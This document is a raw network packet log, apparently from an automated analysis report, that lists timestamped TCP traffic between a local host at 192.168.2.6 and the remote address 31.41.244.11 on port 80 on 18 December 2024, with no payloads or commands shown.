                                                                                                                                                                  Dec 18, 2024 11:09:28.181752920 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.181788921 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.181854963 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.181890011 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.182842970 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.182904005 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.182909966 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.182946920 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.183763027 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.183806896 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.183952093 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.183993101 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.184689045 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.184735060 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.184837103 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.184892893 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.185662985 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.185714960 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.185791969 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.185827971 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.186667919 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.186709881 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.186765909 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.186801910 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.187669992 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.187711954 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.187772036 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.187808990 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.188649893 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.188698053 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.188772917 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.188810110 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.189619064 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.189671993 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.189678907 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.189708948 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.190599918 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.190644026 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.190694094 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.190823078 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.191581964 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.191637039 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.191714048 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.191755056 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.192569017 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.192621946 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.192678928 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.192715883 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.193564892 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.193617105 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.193635941 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.193670034 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.194561958 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.194617987 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.194694042 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.195038080 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.195558071 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.195606947 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.335338116 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.335422039 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.335433960 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.335484982 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.335526943 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.335572004 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.335593939 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.335635900 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.336528063 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.336580992 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.336771011 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.336847067 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.337496996 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.337548018 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.337555885 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.337598085 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.338510990 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.338565111 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.338628054 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.338677883 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.339561939 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.339598894 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.339615107 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.339644909 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.340425968 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.340477943 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.340538979 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.340585947 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.341425896 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.341475964 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.341538906 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.341583967 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.342432022 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.342483044 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.342518091 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.342560053 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.343426943 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.343472004 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.343491077 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.343539000 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.344438076 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.344489098 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.344511986 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.344556093 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.345408916 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.345460892 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.345478058 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.345520020 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.346332073 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.346376896 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.346457958 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.346503019 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.347326994 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.347368956 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.347476006 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.347524881 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.348300934 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.348347902 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.348385096 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.348428965 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.349251986 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.349292040 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.349363089 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.349405050 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.350292921 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.350337982 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.350459099 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.350502968 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.351228952 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.351274014 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.351356030 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.351402044 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.352179050 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.352221966 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.352335930 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.352380037 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.353185892 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.353230953 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.353317976 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.353358984 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.354528904 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.354573011 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.354608059 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.354651928 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.355580091 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.355626106 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.355633020 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.355673075 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.356849909 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.356905937 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.356966019 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.357012033 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.358031988 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.358077049 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.358294010 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.358339071 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.359308004 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.359364986 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.359527111 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.359571934 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.360678911 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.360759020 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.360827923 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.360882998 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.361915112 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.361964941 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.362050056 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.362096071 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.363280058 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.363327980 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.363631964 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.363675117 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.364505053 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.364547968 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.364620924 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.364662886 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.365879059 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.365928888 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.366055012 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.366100073 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.367501020 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.367562056 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.368015051 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.368062019 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.368439913 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.368480921 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.368554115 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.368597984 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.369040966 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.369086981 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.369149923 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.369193077 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.369781017 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.369826078 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.369857073 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.369900942 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.370513916 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.370559931 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.370569944 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.370610952 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.371196985 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.371243954 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.371256113 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.371299028 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.371942997 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.371989965 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.372065067 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.372107983 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.372690916 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.372739077 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.372806072 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.372849941 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.373490095 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.373536110 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.373790026 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.373831034 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.374216080 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.374264002 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.374327898 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.374377012 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.374963999 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.375014067 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.375086069 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.375129938 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.375921965 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.375976086 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.376028061 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.376069069 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.376765013 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.376816034 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.376889944 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.376935005 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.378093004 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.378134966 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.378247023 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.378285885 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.379241943 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.379281998 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.379426956 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.379466057 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.379895926 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.379940987 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.379986048 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.380022049 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.380870104 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.380912066 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.380995989 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.381032944 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.382253885 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.382294893 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.382441044 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.382477999 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.383253098 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.383291960 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.383346081 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.383383036 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.383913040 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.383953094 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.384036064 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.384072065 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.385276079 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.385329008 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.385371923 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.385410070 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.386652946 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.386698961 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.386744022 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.386790037 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.387583971 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.387595892 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.387625933 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.387639999 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.388299942 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.388338089 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.529791117 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.529887915 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.529949903 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.529989004 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.530031919 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.530067921 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.530215979 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.530256033 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.530877113 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.530891895 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.530922890 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.531887054 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.531925917 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.532033920 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.532069921 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.533190966 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.533305883 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.533346891 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.533385992 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.534235954 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.534286976 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.534338951 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.534379959 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.535060883 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.535074949 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.535109043 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.535128117 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.535650969 CET804991231.41.244.11192.168.2.6
